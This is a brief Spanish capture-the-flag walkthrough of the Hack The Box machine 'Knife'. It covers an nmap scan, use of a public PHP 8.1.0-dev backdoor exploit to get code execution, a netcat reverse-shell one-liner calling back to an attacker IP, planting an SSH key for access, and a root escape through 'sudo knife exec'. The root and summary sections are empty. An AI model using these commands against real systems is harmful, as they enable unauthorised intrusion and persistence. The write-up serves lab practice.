# Knife

**OS**: Linux \
**Dificultad**: Fácil \
**Puntos**: 20

## Resumen

## Nmap Scan

`nmap -sV -sC -oN nmap.txt 10.10.10.242`

```
Nmap scan report for 10.10.10.242
Host is up (0.071s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
|   256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_  256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title:  Emergent Medical Idea
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

## Enumeración

![1](img/1.png)

`python3 php_rce.py -u http://10.10.10.242/ -c id`

![2](img/2.png)

- `nc -lvnp 1234`
- `python3 php_rce.py -u http://10.10.10.242/ -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.33 1234 >/tmp/f'`

![3](img/3.png)

## Escalada de Privilegios (User)

`ssh-keygen -t ed25519`
`cat /home/james`
`echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDIJtoG3+G8oA/l2gtTMiqjNpC1bv8HCZkrGZFT/LroQ root@mcfly' > .ssh/authorized_keys`
`ssh james@10.10.10.242`

`sudo -l`
`sudo /usr/bin/knife | grep -B 2 exec`

`echo 'system("/bin/bash")' > doom.rb`
`chmod +x doom.rb`
`sudo /usr/bin/knife exec doom.rb`

## Escalada de Privilegios (Root)

## Referencias
https://packetstormsecurity.com/files/162749/php_8.1.0-dev.py.txt